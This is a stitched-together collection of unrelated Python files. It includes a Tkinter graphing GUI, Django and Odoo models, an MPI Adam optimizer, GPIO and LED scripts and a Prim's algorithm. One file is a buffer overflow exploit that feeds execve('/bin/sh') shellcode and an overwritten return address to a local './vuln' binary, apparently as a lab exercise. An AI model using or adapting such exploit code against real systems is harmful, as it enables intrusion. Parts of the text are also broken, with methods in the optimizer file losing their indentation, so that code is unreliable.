        col_list = lb.Listbox2(f4, height=5, width=40,
                               selectmode=graph_field_select_mode)
        col_list.insert(tk.END, self.prog.get_graph_field())
        col_list.grid(column=2, row=5, sticky='nw')

        # trace method for graph_type: pie charts accept a single column only
        def graphchange(var, indx, mode):
            gtype = graph_type.get()
            if gtype == 'pie':
                graph_field_select_mode = tk.SINGLE
            else:
                graph_field_select_mode = tk.EXTENDED
            col_list.config(selectmode=graph_field_select_mode)
        graph_type.trace_add('write', graphchange)
        Label(f4, text="OPTIONS:").grid(column=4, row=2, sticky='w')
        legend = tk.BooleanVar()
        legend.set(False)
        Checkbutton(f4, text="LEGEND", variable=legend).grid(
            column=4, row=3, sticky='nwe')
        subplots = tk.BooleanVar()
        subplots.set(False)
        Checkbutton(f4, text="SUBPLOTS", variable=subplots).grid(
            column=4, row=4, sticky='nwe')
        stacked = tk.BooleanVar()
        stacked.set(False)
        Checkbutton(f4, text="STACKED", variable=stacked).grid(
            column=4, row=5, sticky='nwe')

        # trace method for subplots: SUBPLOTS and STACKED are mutually exclusive
        def optionsubplot(var, indx, mode):
            if subplots.get() == True and stacked.get() == True:
                stacked.set(False)

        # trace method for stacked
        def optionstacked(var, indx, mode):
            if subplots.get() == True and stacked.get() == True:
                subplots.set(False)
        subplots.trace_add('write', optionsubplot)
        stacked.trace_add('write', optionstacked)
        selecteddict = {}

        # Double-click on a column opens a dialog to pick which of its unique
        # values should be included; choices accumulate in selecteddict.
        def select_option(evnt):
            w = evnt.widget
            index = int(w.curselection()[0])
            value = w.get(index)
            optsc = tk.Toplevel(self.window)
            optsc.geometry('300x300')
            optsc.transient()
            optsc.focus_set()
            optsc.title('CHOOSE FIELDS')
            Label(optsc, text=" ").pack()
            col_list = tk.Listbox(
                optsc, height=5, width=40, selectmode=tk.EXTENDED)
            col_list.insert(tk.END, *self.prog.get_unique_val(value))
            col_list.config(width=35)
            col_list.pack()
            # SELECT button start
            btn_sel = Button(optsc, text="SELECT")

            # Nested function for sel button save choices
            def click_sel():
                selecteddict[value] = [col_list.get(
                    x) for x in col_list.curselection()]
                optsc.destroy()
            btn_sel.configure(command=click_sel)
            btn_sel.pack()
            # SELECT button end
            # RETURN button start
            btn_ret = Button(optsc, text="DON'T SELECT")

            # Nested function for ret button
            def click_ret():
                optsc.destroy()
            btn_ret.configure(command=click_ret)
            btn_ret.pack()
            self.window.wait_window(optsc)
            # color_type.trace_add('write', change_color)
        col_list.bind('<Double-Button-1>', select_option)
        # GRAPH button start
        btn_graph = Button(f4, text="GENERATE GRAPH")

        # Nested click function for graph generation
        def click_graph():
            self.window.config(cursor="wait")
            # get dataframe and generate graph
            slist = []
            for i in col_list.curselection():
                slist.append(col_list.get(i))
            if not slist:
                self.msg("COLUMNS")
                return
            elif graph_type.get() == "SELECT":
                self.msg("GRAPH TYPE")
                return
            self.report = ReportGen(graph_type.get(), legend.get(),
                                    subplots.get(), stacked.get(), slist, selecteddict)
            df = self.prog.get_df(slist, selecteddict)
            self.showmatgraph(df, graph_type.get(), legend.get(),
                              subplots.get(), stacked.get())
        btn_graph.configure(command=click_graph)
        btn_graph.grid(column=4, row=7, sticky='s')
        # GRAPH button end
        # REFRESH button start
        btn_ref = Button(f4, text="REFRESH")

        # Nested refresh function for ref button
        def click_ref():
            collist = self.prog.get_graph_field()
            col_list.delete(0, tk.END)
            col_list.insert(tk.END, *collist)
            self.set_status("REFRESHED!")
            self.window.config(cursor="arrow")
        btn_ref.configure(command=click_ref)
        btn_ref.grid(column=2, row=7, sticky='ws')
        # REFRESH button end
        self.grid_config(f4)
        return f4

    def statusbar(self):
        """Create and return the single-row status bar Label."""
        status = Label(self.window, textvariable=self.statusTxt,
                       relief=tk.SUNKEN, width=self.frame_w, cursor='hand2')
        return status

    def set_status(self, txt):
        """Set the status bar text."""
        self.statusTxt.set(txt)

    def getlink(self, *arg):
        """Copy the sample data link to the clipboard."""
        pyperclip.copy('https://api.covid19india.org/raw_data.json')
        self.set_status("LINK COPIED TO CLIPBOARD!")

    def helpscreen(self, *arg):
        """Open the HELP window with usage notes and download links."""
        helpsc = tk.Toplevel(self.window)
        helpsc.geometry('300x300')
        helpsc.transient()
        helpsc.focus_set()
        helpsc.title('HELP')
        help_txt = """\nTabs:\n1.DOWNLOAD: Download, view first 100 rows and save dataframe as CSV\n2.SELECT: Select graph type, node color field, and view the color assigned, save the generated graph file as GEXF\n3.DISPLAY: Check the graph attributes, open the file in gephi(installation required for viewing graph).\n4.STATIC GRAPH: Select graph type, graph fields(& reorder them), options, generate static graph and reports.\n\n Open CSV, GEXF file directly for viewing results."""
        Label(helpsc, text=help_txt, justify=tk.LEFT, wraplength=250).pack()
        # LINK button
        Button(helpsc, text="COPY LINK", command=self.getlink).pack()
        # GEPHI_DOWNLOAD button start
        btn_link = Button(helpsc, text="DOWNLOAD GEPHI")

        # Nested function for link button to open website
        def click_link():
            webbrowser.open('https://gephi.org/users/download/')
        btn_link.configure(command=click_link)
        btn_link.pack()
        # GEPHI_DOWNLOAD button end

    def aboutscreen(self, *arg):
        """Open the ABOUT window."""
        aboutsc = tk.Toplevel(self.window)
        aboutsc.geometry('300x300')
        aboutsc.transient()
        aboutsc.focus_set()
        aboutsc.title('ABOUT')
        about_txt = """\nPYSNV\n\nVersion:1.3\n\nThis software creates dynamic network graph from csv.\n\nPackages:Networkx, matplotlib, pandas, tkinter.\n\n"""
        Label(aboutsc, text=about_txt, justify=tk.CENTER, wraplength=250).pack()
        # LINK button start
        btn_link = Button(aboutsc, text="CHECK WEBSITE")

        # Nested function for link button to open website
        def click_link():
            webbrowser.open('https://github.com/sakshamsneh/pySNVCovid')
        btn_link.configure(command=click_link)
        btn_link.pack()
        # LINK button end

    def quitscreen(self, *arg):
        """Confirm-quit dialog (also used as the window close handler)."""
        quitsc = tk.Toplevel(self.window)
        quitsc.geometry('220x50')
        quitsc.transient()
        quitsc.focus_set()
        quitsc.title('QUIT?')
        Button(quitsc, text="YES", command=self.window.quit).pack()
        Button(quitsc, text="NO", command=quitsc.destroy).pack()

    def menubar(self):
        """Build and return the application menu bar."""
        menubar = tk.Menu(self.window)
        helpmenu = tk.Menu(menubar, tearoff=0)
        helpmenu.add_command(label="Sample Link",
                             command=self.getlink, accelerator="Ctrl+l")
        helpmenu.add_command(
            label="Help", command=self.helpscreen, accelerator="Ctrl+h")
        helpmenu.add_command(
            label="About", command=self.aboutscreen, accelerator="Ctrl+Shift+a")
        helpmenu.add_command(
            label="Quit", command=self.quitscreen, accelerator="Ctrl+q")
        menubar.add_cascade(label="App", menu=helpmenu)
        return menubar

    def main(self):
        """Assemble the window (menu, notebook tabs, status bar) and run the loop."""
        self.window.geometry('480x360')
        self.window.resizable(0, 0)
        self.window.title("pySNV")
        menubar = self.menubar()
        self.window.config(menu=menubar)
        nb = Notebook(self.window)  # Notebook
        nb.grid(row=1, sticky='nw')
        f1 = self.frame1(nb)
        f2 = self.frame2(nb)
        f3 = self.frame3(nb)
        f4 = self.frame4(nb)
        # Adding the tab frames
        nb.add(f1, text="DOWNLOAD")
        nb.add(f2, text="SELECT")
        nb.add(f3, text="DISPLAY")
        nb.add(f4, text="STATIC GRAPH")
        self.window.bind('<Control-l>', self.getlink)
        self.window.bind('<Control-h>', self.helpscreen)
        self.window.bind('<Control-A>', self.aboutscreen)
        self.window.bind('<Control-q>', self.quitscreen)
        self.window.protocol("WM_DELETE_WINDOW", self.quitscreen)
        nb.select(f1)
        nb.enable_traversal()
        st = self.statusbar()  # Creates status bar
        st.grid(row=2, sticky='ws')
        self.window.mainloop()
|
from django.conf import settings
from confapp import conf
from pyforms.basewidget import segment
from pyforms.controls import ControlCheckBox
from pyforms_web.web.middleware import PyFormsMiddleware
from pyforms_web.widgets.django import ModelAdminWidget
from finance.models import CostCenter
from .financeproject_list import FinanceProjectListApp
class CostCenterListApp(ModelAdminWidget):
    """Pyforms ModelAdmin app listing finance CostCenter records.

    Adds an 'Active' toolbar checkbox that restricts the list to active
    cost centers, and shows the related finance projects inline.
    """

    TITLE = 'Cost Centers'
    UID = 'cost-centers'
    MODEL = CostCenter

    LIST_DISPLAY = ['code', 'name', 'start_date', 'end_date']
    LIST_FILTER = ['group', 'project__code']
    SEARCH_FIELDS = ['name__icontains', 'code__icontains']
    INLINES = [FinanceProjectListApp]

    FIELDSETS = [
        segment(
            'name',
            ('code', 'start_date', 'end_date'),
            'group',
        ),
        ' ',
        'FinanceProjectListApp',
        ' ',
    ]

    # ORQUESTRA CONFIGURATION
    # =========================================================================
    ORQUESTRA_MENU = 'left>FinancesDashboardWidget'
    ORQUESTRA_MENU_ORDER = 10
    ORQUESTRA_MENU_ICON = 'boxes'
    LAYOUT_POSITION = conf.ORQUESTRA_HOME
    # =========================================================================

    AUTHORIZED_GROUPS = ['superuser', settings.PROFILE_LAB_ADMIN]

    def __init__(self, *args, **kwargs):
        """Create the 'Active' filter control before the base widget builds the list."""
        self._active = ControlCheckBox(
            'Active',
            default=True,
            label_visible=False,
            changed_event=self.populate_list,  # re-query whenever toggled
            # field_style='text-align:right;',  # FIXME breaks form
        )
        super().__init__(*args, **kwargs)
        # Edit filter label
        self._list.custom_filter_labels = {
            'project__code': 'Project Code',
        }

    def get_toolbar_buttons(self, has_add_permission=False):
        """Toolbar = optional Add button followed by the Active checkbox."""
        return tuple(
            (['_add_btn'] if has_add_permission else []) + [
                '_active',
            ]
        )

    def get_queryset(self, request, qs):
        """Limit the queryset to active cost centers when the checkbox is on."""
        if self._active.value:
            qs = qs.active()
        return qs

    def has_remove_permissions(self, obj):
        """Only superusers may delete these objects."""
        user = PyFormsMiddleware.user()
        return user.is_superuser
|
from django import forms
from .models import Post, Comment
# class PostForm(forms.ModelForm):
#
# class Meta:
# model = Post
# fields = ('title', 'author', 'description', 'category')
# widgets = {
# 'todo': forms.TextInput(
# attrs={
# 'id': 'inputPassword2',
# 'class': 'form-control',
# 'placeholder': 'Add your todo'
# }
# )
# }
# def save(self):
# new_todo = Todo.objects.create(
# todo= self.cleaned_data["todo"],
# author= self.request.User,
# )
# return new_todo
class CommentForm(forms.ModelForm):
    """ModelForm for creating a Comment.

    Exposes only the `body` field, rendered as a 3-row
    Bootstrap-styled (`form-control`) textarea with a placeholder.
    """

    class Meta:
        model = Comment
        fields = ('body',)
        widgets = {
            'body': forms.Textarea(
                attrs={
                    'class': 'form-control',
                    'placeholder': 'write a comment...',
                    'rows': '3',
                }
            )
        }
# Adapted from https://github.com/openai/baselines/blob/master/baselines/common/mpi_adam.py
import rlkit.torch.optim.util as U
import torch
from torch.optim.optimizer import Optimizer
import math
import numpy as np
import rlkit.torch.pytorch_util as ptu
from rlkit.core.serializable import Serializable
try:
from mpi4py import MPI
except ImportError:
MPI = None
class MpiAdam(Optimizer):
    def __init__(self,
                 params,
                 lr=1e-3,
                 beta1=0.9,
                 beta2=0.999,
                 epsilon=1e-08,
                 scale_grad_by_procs=True,
                 comm=None,
                 gpu_id=0):
        """Adam optimizer whose gradients are summed across MPI workers.

        Keeps flat first/second moment buffers (``m``, ``v``) spanning all
        parameters, sized from the project's flat-parameter utilities.

        :param params: parameters, as accepted by ``torch.optim.Optimizer``.
        :param lr: Adam step size.
        :param beta1: decay rate for the first moment estimate.
        :param beta2: decay rate for the second moment estimate.
        :param epsilon: denominator term for numerical stability.
        :param scale_grad_by_procs: divide the all-reduced gradient by the
            number of MPI processes (i.e. average instead of sum).
        :param comm: MPI communicator; defaults to ``COMM_WORLD`` when mpi4py
            is importable, else ``None`` (single-process mode).
        :param gpu_id: CUDA device index for the moment buffers when the
            project is in "gpu_opt" mode.
        """
        # Serializable.quick_init(self,
        #                         locals())
        super().__init__(params, dict())
        self.lr = lr
        self.beta1 = beta1
        self.beta2 = beta2
        self.epsilon = epsilon
        self.scale_grad_by_procs = scale_grad_by_procs
        # Total scalar count over all parameter groups (flat buffer length).
        total_params = sum([U.num_elements(param) for param in U.get_flat_params(self.param_groups)])
        if ptu.get_mode() == "gpu_opt":
            assert gpu_id is not None
            self.m = torch.zeros(total_params, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
            self.v = torch.zeros(total_params, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
        elif not ptu.get_mode():  # CPU is false
            self.m = torch.zeros(total_params, dtype=torch.float32)
            self.v = torch.zeros(total_params, dtype=torch.float32)
        else:
            # Any other (truthy) mode is unsupported for this optimizer.
            print(ptu.get_mode())
            raise NotImplementedError
        self.t = 0  # Adam timestep (number of updates applied)
        # Helpers to read/write all parameters as one flat vector.
        self.set_params_from_flat = U.SetFromFlat(self.param_groups)
        self.get_params_as_flat = U.GetParamsFlat(self.param_groups)
        self.comm = MPI.COMM_WORLD if comm is None and MPI is not None else comm
def __getstate__(self):
# d = Serializable.__getstate__(self)
# d = dict()
d = super().__getstate__()
d['lr'] = self.lr
d['beta1'] = self.beta1
d['beta2'] = self.beta2
d['epsilon'] = self.epsilon
d['scale_grad_by_procs'] = self.scale_grad_by_procs
d["m"] = self.m.clone()
d["v"] = self.v.clone()
d["t"] = self.t
return d
def __setstate__(self, d):
# Serializable.__setstate__(self, d)
super().__setstate__(d)
if "lr" in d.keys():
self.lr = d['lr']
else:
self.lr = 3E-4
self.beta1 = d['beta1']
self.beta2 = d['beta2']
self.epsilon = d['epsilon']
self.scale_grad_by_procs = d['scale_grad_by_procs']
self.m = d["m"]
self.v = d["v"]
self.t = d["t"]
    def reset_state(self, gpu_id=0):
        """Replace the Adam moment buffers with fresh zeros on ``cuda:<gpu_id>``.

        NOTE(review): this always places the new buffers on CUDA, even when
        the optimizer was constructed in CPU mode — confirm that is intended.
        """
        self.m = torch.zeros_like(self.m, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
        self.v = torch.zeros_like(self.v, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
    def reconnect_params(self, params):
        """Re-bind the optimizer to a (new) parameter iterable, keeping m/v/t.

        Useful after parameters were re-created (e.g. model moved or reloaded).
        """
        super().__init__(params, dict())  # This does not alter the optimizer state m or v
        self.reinit_flat_operators()
def reinit_flat_operators(self):
    """Rebuild the helpers that read/write parameters as one flat vector."""
    self.set_params_from_flat = U.SetFromFlat(self.param_groups)
    self.get_params_as_flat = U.GetParamsFlat(self.param_groups)
def step(self, closure=None):
    """
    Aggregate and reduce gradients across all threads
    :param closure:
    :return:
    """
    # self.param_groups updated on the GPU, stepped, then moved back to its own thread
    # Flatten this worker's gradients into a single 1-D tensor.
    localg = U.get_flattened_grads(self.param_groups)
    # Every 100 steps, verify all MPI ranks still hold identical parameters.
    if self.t % 100 == 0:
        self.check_synced()
    # MPI works on numpy buffers, so move the gradient to host memory.
    if localg.device.type == "cpu":
        localg = localg.detach().numpy()
    else:
        localg = localg.cpu().detach().numpy()
    if self.comm is not None:
        # Sum gradients over all ranks, optionally averaging by world size.
        globalg = np.zeros_like(localg)
        self.comm.Allreduce(localg, globalg, op=MPI.SUM)
        if self.scale_grad_by_procs:
            globalg /= self.comm.Get_size()
        if localg.shape[0] > 1 and self.comm.Get_size() > 1:
            # Sanity check: with >1 ranks the reduced gradient should differ.
            assert not (localg == globalg).all()
        globalg = ptu.from_numpy(globalg, device=torch.device(ptu.get_device()))
    else:
        globalg = ptu.from_numpy(localg, device=torch.device(ptu.get_device()))
    self.t += 1
    # Bias-corrected Adam step size.
    a = self.lr * math.sqrt(1 - self.beta2**self.t)/(1 - self.beta1**self.t)
    # Exponential moving averages of the gradient and its square.
    self.m = self.beta1 * self.m + (1 - self.beta1) * globalg
    self.v = self.beta2 * self.v + (1 - self.beta2) * (globalg * globalg)
    step_update = (- a) * self.m / (torch.sqrt(self.v) + self.epsilon)
    # Apply the update and write the parameters back on the CPU side.
    self.set_params_from_flat((self.get_flat_params() + step_update).to(device=torch.device("cpu")))
def sync(self):
    """Broadcast rank 0's parameters to every rank (no-op without MPI)."""
    if self.comm is None:
        return
    theta = ptu.get_numpy(self.get_params_as_flat())
    self.comm.Bcast(theta, root=0)
    self.set_params_from_flat(ptu.from_numpy(theta))
def check_synced(self):
    """Assert this rank's parameters match rank 0's (elementwise)."""
    # If this fails on iteration 0, remember to call SYNC for each optimizer!!!
    if self.comm is None:
        return
    if self.comm.Get_rank() == 0:  # this is root
        # Root publishes its parameters for the others to compare against.
        theta = ptu.get_numpy(self.get_params_as_flat())
        self.comm.Bcast(theta, root=0)
    else:
        thetalocal = ptu.get_numpy(self.get_params_as_flat())
        thetaroot = np.empty_like(thetalocal)
        self.comm.Bcast(thetaroot, root=0)
        assert (thetaroot == thetalocal).all(), (thetaroot, thetalocal)
def to(self, device=None):
    """Move the Adam moment buffers to *device* (ptu.device when omitted)."""
    target = ptu.device if device is None else device
    self.m = self.m.to(device=target)
    self.v = self.v.to(device=target)
def get_flat_params(self):
    """
    Get params from a CPU thread
    :return:
    """
    # Concatenate every parameter tensor, flattened, into one 1-D tensor.
    return torch.cat([param.view([U.num_elements(param)]) for param in U.get_flat_params(self.param_groups)], dim=0)
from collections import OrderedDict
import re, os
import Config
class subgroup(object):
    """A named color bucket holding the words assigned to that color."""

    def __init__(self, colorName, word_list):
        self.colorName = colorName
        self.word_list = word_list

    def add_words(self, word_list):
        """Append every word in *word_list* to this bucket."""
        self.word_list.extend(word_list)

    def check_word(self, word):
        """Return True when *word* belongs to this bucket."""
        return word in self.word_list

    def set_wordlist(self, word_list):
        """Replace the bucket contents from a comma-separated string."""
        self.word_list = word_list.split(',')
class groups(object):
    """Ordered collection of subgroup buckets, keyed by color name."""

    def __init__(self, group):
        self.group = group
        self.colorName = OrderedDict([])

    def lookup_colorName(self, colorName):
        """Return the subgroup for *colorName*, or None when absent."""
        return self.colorName.get(colorName)

    def add_colorName(self, colorName, word_list):
        """Add words to an existing color bucket, or create the bucket."""
        existing = self.lookup_colorName(colorName)
        if existing is None:
            self.colorName[colorName] = subgroup(colorName, word_list)
        else:
            existing.add_words(word_list)

    def find_word(self, word):
        """Return the color name containing *word* (None when not found)."""
        for name, bucket in self.colorName.items():
            if bucket.check_word(word):
                return name

    def set_wordlist(self, colorName, word_list):
        """Replace a bucket's words from a CSV string, if the bucket exists."""
        bucket = self.lookup_colorName(colorName)
        if bucket is not None:
            bucket.set_wordlist(word_list)
class color_grouping(object):
    """Word->color assignments parsed from the configured wordcolor file.

    File format, one entry per line: [group][colorName] "word1,word2,..."
    Lines starting with '#' and blank lines are ignored.
    """
    def __init__(self):
        self.groups = OrderedDict([])  # group name -> groups instance
        self.datafile_path = Config.settings.wordcolor_path
        # Regex for the [group][colorName] "csv words" line format.
        self.data_format = '\[(?P<group>\w+)\]\[(?P<colorName>\w+|\s*)\]\s*\"(?P<word_list>.+)\"'
        self.reload()
    def reload(self):
        """Re-read the word/color data from disk."""
        self.load_color_data()
    def lookup_group(self, group):
        """Return the groups object for *group*, or None."""
        return self.groups.get(group)
    def load_color_data(self):
        """Parse all entry of the wordcolor.txt file
        """
        self.groups.clear()
        if os.path.isfile(self.datafile_path):
            with open(self.datafile_path, 'r') as fi:
                for line in fi:
                    # Skip comment lines and blank/whitespace-only lines.
                    if not re.match('\#.+', line) and not re.match('\s*$', line) and len(line.strip()) != 0:
                        mat = re.match(self.data_format, line)
                        if mat:
                            group = mat.group("group")
                            colorName = mat.group("colorName")
                            word_list_str = mat.group("word_list")
                            # Create the group lazily on first sighting.
                            if not self.lookup_group(group):
                                self.groups[group] = groups(group)
                            self.lookup_group(group).add_colorName(colorName, word_list_str.split(','))
    def get_all_colorname(self):
        """Return every distinct color name across all groups."""
        colors=[]
        for group in self.groups:
            for colorName in self.groups[group].colorName:
                if colorName not in colors:
                    colors.append(colorName)
        return colors
    def get_colorname(self,word,group):
        """Get the colorname of a word in a group
        check in the default group if nothing found in
        the given group
        """
        if group in self.groups:
            cN=self.groups[group].find_word(word)
            if cN:
                return cN
        # Fall back to the 'General' (default) group.
        cND=self.groups['General'].find_word(word)
        if cND:
            return cND
    def get_all_group_words(self,group):
        """ Return all the words of a group and
        the ones in the default group
        """
        l=[]
        for colorName in self.groups['General'].colorName:
            for word in self.groups['General'].colorName[colorName].word_list:
                l.append(word)
        if group in self.groups:
            for colorName in self.groups[group].colorName:
                for word in self.groups[group].colorName[colorName].word_list:
                    l.append(word)
        return l
# Module-level singleton; instantiating triggers a parse of the wordcolor file.
wd = color_grouping()
|
# first-program
print("hello world")
|
import mraa
import time
# P9_14 (GPIO_50) is mraa pin 60; P9_16 (GPIO_51) is mraa pin 62.
gpio_1 = mraa.Gpio(60)
gpio_2 = mraa.Gpio(62)

# Both pins drive outputs.
gpio_1.dir(mraa.DIR_OUT)
gpio_2.dir(mraa.DIR_OUT)

# Blink the two pins in anti-phase with a one-second half-period, forever.
while True:
    for level_1, level_2 in ((1, 0), (0, 1)):
        gpio_1.write(level_1)
        gpio_2.write(level_2)
        time.sleep(1)
|
def minVertex(S, C):
    """Return the index of the cheapest vertex not yet in the tree.

    Args:
        S: membership flags; S[i] == 0 means vertex i is outside the tree.
        C: candidate cost per vertex.

    Returns:
        Index of the cheapest out-of-tree vertex, or -1 when every vertex
        is already in the tree.

    Fix: the original named its result `min`, shadowing the builtin.
    NOTE(review): a cost of -1 is used elsewhere as "no edge yet" and
    compares as cheapest here — callers must relax costs before selecting.
    """
    best = -1
    for i in range(0, len(S)):
        if S[i] == 0 and (best == -1 or C[i] < C[best]):
            best = i
    return best
def prim(G):
    """Compute a minimum spanning tree of G with Prim's algorithm.

    Args:
        G: adjacency matrix; G[v][w] > 0 is the weight of edge (v, w),
           0 means no edge. The graph is assumed undirected.

    Returns:
        (P, C, S): P[w] is w's parent in the tree (-1 for the root and
        unreached vertices), C[w] the weight of the edge joining w to the
        tree (-1 if unreached), and S[w] == 1 iff w entered the tree.

    Bug fix: the original's outer `for v in range(len(G))` clobbered the
    vertex selected at the end of each iteration, so edges were relaxed
    from every vertex in index order instead of from the growing tree.
    The selection below also skips C == -1 (no edge yet) vertices.
    """
    n = len(G)
    C = [-1] * n  # cheapest known edge weight into the tree, per vertex
    S = [0] * n   # tree membership flags
    P = [-1] * n  # parent pointers
    S[0] = 1      # grow the tree from vertex 0
    v = 0
    for _ in range(n):
        # Relax edges leaving the vertex that just joined the tree.
        for w in range(n):
            if G[v][w] > 0 and S[w] == 0 and (C[w] == -1 or G[v][w] < C[w]):
                P[w] = v
                C[w] = G[v][w]
        # Pick the cheapest reachable vertex still outside the tree.
        v = -1
        for i in range(n):
            if S[i] == 0 and C[i] != -1 and (v == -1 or C[i] < C[v]):
                v = i
        if v == -1:
            # Tree complete, or the remaining vertices are unreachable.
            break
        S[v] = 1
    return (P, C, S)
|
from django.contrib import admin
# Register your models here.
from .models import *
# Expose every chat model in the Django admin with the default options.
for _model in (Camp, User, Group, Bot, Message, Favorite, Access_Token):
    admin.site.register(_model)
#!/usr/bin/env python
import struct
import subprocess
# vuln.c buf addr
# Target return address: the address of `buf` inside vuln (found via gdb).
# The first assignment is a stale probe; only the second value is used.
ret_addr = 0x7fffffffe1b0
ret_addr = 0x7fffffffe0a0
# execve(/bin/sh)
# 27-byte x86-64 execve("/bin/sh") shellcode (Python 2 byte-string semantics).
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# Payload layout: shellcode, "A" padding up to the 256-byte buffer plus 8
# bytes of saved RBP, then the little-endian return address overwriting RIP.
buf = shellcode
buf += "A" * (256 + 8 - len(shellcode))
# NOTE(review): .rstrip("\0") on struct.pack output relies on Python 2 str
# semantics — this script will not run unmodified under Python 3.
buf += struct.pack("<Q", ret_addr).rstrip("\0")
subprocess.call(["./vuln", buf])
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
class employee_loan_type(models.Model):
    """Loan/deduction type: amount limit, term, interest and accounting setup."""
    _name = 'employee.loan.type'
    _description = 'employee_loan_type'

    name = fields.Char('Nombre', required="1")
    # Maximum amount an employee may borrow under this type.
    loan_limit = fields.Float('Límite del monto del deducción', default=50000, required="1")
    # Number of installments for repayment.
    loan_term = fields.Integer('Plazo de la deducción', default=12, required="1")
    is_apply_interest = fields.Boolean('Aplicar interés')
    interest_rate = fields.Float('Taza de interés',default=10)
    # 'liner': interest on the full amount; 'reduce': on the outstanding balance.
    interest_type = fields.Selection([('liner','Sobre monto total'),('reduce','Sobre saldo pendiente')],string='Tipo de interés',
        default='liner')
    loan_account = fields.Many2one('account.account',string='Cuenta de prestamo')
    interest_account = fields.Many2one('account.account',string='Cuenta de intereses')
    journal_id = fields.Many2one('account.journal',string='Diario')
    periodo_de_pago = fields.Selection([('Semanal','Semanal'), ('Quincenal','Quincenal')], string='Periodo de pago', required="1")
    tipo_deduccion = fields.Selection([('1','Préstamo'), ('2','Descuento periodico 1'), ('3','Descuento periodico 2')], string='Tipo de deducción', required="1")

    @api.constrains('is_apply_interest','interest_rate','interest_type')
    def _check_interest_rate(self):
        # When interest applies, the rate must be positive and a type chosen.
        for loan in self:
            if loan.is_apply_interest:
                if loan.interest_rate <= 0:
                    raise ValidationError("La tasa de interés debe ser mayor de 0.00")
                if not loan.interest_type:
                    raise ValidationError("Por favor seleccione el tipo de interés")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
import unittest
from katas.kyu_7.unique_pairs import projectPartners
class UniquePairsTestCase(unittest.TestCase):
    """projectPartners(n) should count unordered pairs: n * (n - 1) / 2."""

    def test_equals(self):
        self.assertEqual(1, projectPartners(2))

    def test_equals_2(self):
        self.assertEqual(3, projectPartners(3))

    def test_equals_3(self):
        self.assertEqual(6, projectPartners(4))

    def test_equals_4(self):
        self.assertEqual(10, projectPartners(5))
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
# Print the sum of the geometric series 0.4 * 2**k for k = 0..29.
total = 0.0
term = 0.4
for _ in range(30):
    total += term
    term *= 2
print(total)
|
"""
Problem 3: I like to move it, move it
"""
import numpy as np
# load number of trucks for locations on corridors
arr = np.load("arrays.npy")
trucks_per_location = arr.tolist()

# ENVIRONMENTAL COMPUTATIONS
# define social cost per mile for each diesel truck - from environmental computations
cost_per_mile = 0.27
# define distances between each charging station
distances = [35.5675, 23.0113, 23.7788, 23.4375, 31.2500]  # distance is range/8, in miles
# calculate total carbon emissions per distance for each route
environmental_costs = []  # output list
for i in range(len(distances)):  # this iterates through each route
    total_cost = 0  # this is the environmental cost for that route
    for stop in trucks_per_location[i]:
        # cost at a stop = station spacing * trucks there * $/mile
        cost = distances[i] * stop * cost_per_mile  # cost for that stop
        total_cost += cost
    environmental_costs.append(total_cost)

# ECONOMIC COMPUTATIONS
# charger stop computations
# determine number of charges per stop, is trucks/128
chargers_per_location = arr/128
# take sum of all chargers on each route
charger_costs = []  # output list for economic costs
for i in range(len(chargers_per_location)):
    n = sum(chargers_per_location[i])
    # NOTE(review): -500 capital cost and 0.37*16 revenue per charger are
    # model constants taken on faith — confirm units and sources.
    cost = (-500*n) + (0.37*16*n)
    charger_costs.append(cost)

# rest stop computations
rest_stop_costs = []  # rest stop cost is money earned for rest stop - money earned for diesel
# distances between each routes
route_lengths = [543.3, 408, 390.4, 706.2, 381.9]
# list constants from tables
c1 = 1347.516
c2 = 5377.758
for i in range(len(trucks_per_location)):
    # determine rest stop gains
    gains = 0
    for stop in trucks_per_location[i]:
        gain_from_stop = c1 * (stop/624)
        gains += gain_from_stop
    # determine rest stop loss from not selling diesel
    loss = c2 * (route_lengths[i]/27.33)
    rest_stop_cost = gains - loss
    rest_stop_costs.append(rest_stop_cost)

# compute total costs and benefits (negative is cost, positive is benefits)
total_costs = []
for i in range(len(trucks_per_location)):
    cost_route = environmental_costs[i] + charger_costs[i] + rest_stop_costs[i]
    total_costs.append(cost_route)
|
"""Startup Sequence
Runs a wave sequence of lights from left to right letting us know that the
system is ready.
Author:
Yvan Satyawan <y_satyawan@hotmail.com>
Created on:
May 12, 2021
"""
import board
import neopixel
from math import sin, pi, floor
from time import sleep, time
SLEEP_DURATION = 1        # seconds; not referenced in this module's visible code
PIXEL_PIN = board.D12     # data pin driving the strip
NUM_PIXELS = 45
BRIGHTNESS = 0.2          # global brightness scale (0.0-1.0)
ORDER = neopixel.RGB
# Start index of each LED column; consecutive entries delimit one column.
LED_COLUMNS = (0, 10, 25, 35, 45)
# auto_write=False: pixel writes are buffered until PIXELS.show().
PIXELS = neopixel.NeoPixel(PIXEL_PIN, NUM_PIXELS, brightness=BRIGHTNESS,
                           auto_write=False, pixel_order=ORDER)
def startup():
    """Run a white sine-wave sweep across the LED columns, then blank them.

    Per-column brightness follows sin(pi*t - 0.5*column), clamped at 0,
    so the wave travels left to right over roughly 1.5 seconds.
    """
    sleep(3)
    start_time = time()
    time_delta = 0.
    # 1.477 is where sin(pi * x - 1.5) intercepts the y-axis
    while time_delta < 1.477:
        time_delta = time() - start_time
        for column in range(4):
            # Calculate brightness of a column for the given frame
            frame_brightness = floor(255. * sin((pi * time_delta)
                                                - (float(column) * 0.5)))
            # Make sure it's positive
            frame_brightness = max(frame_brightness, 0)
            for pixel_num in range(LED_COLUMNS[column],
                                   LED_COLUMNS[column + 1]):
                # set all pixels of the column one by one
                PIXELS[pixel_num] = (frame_brightness, frame_brightness,
                                     frame_brightness)
        PIXELS.show()
        sleep(0.0005)
    # Turn off all LEDs just in case
    for i in range(LED_COLUMNS[-1]):
        PIXELS[i] = (0, 0, 0)
    # Bug fix: with auto_write=False the blanking above was never pushed to
    # the strip — an explicit show() is required.
    PIXELS.show()


if __name__ == '__main__':
    startup()
|
import tornado.web
from tornado.web import RequestHandler
# class IndexHandler(RequestHandler):
# def get(self, *args, **kwargs):
# self.write("sunck is a good man")
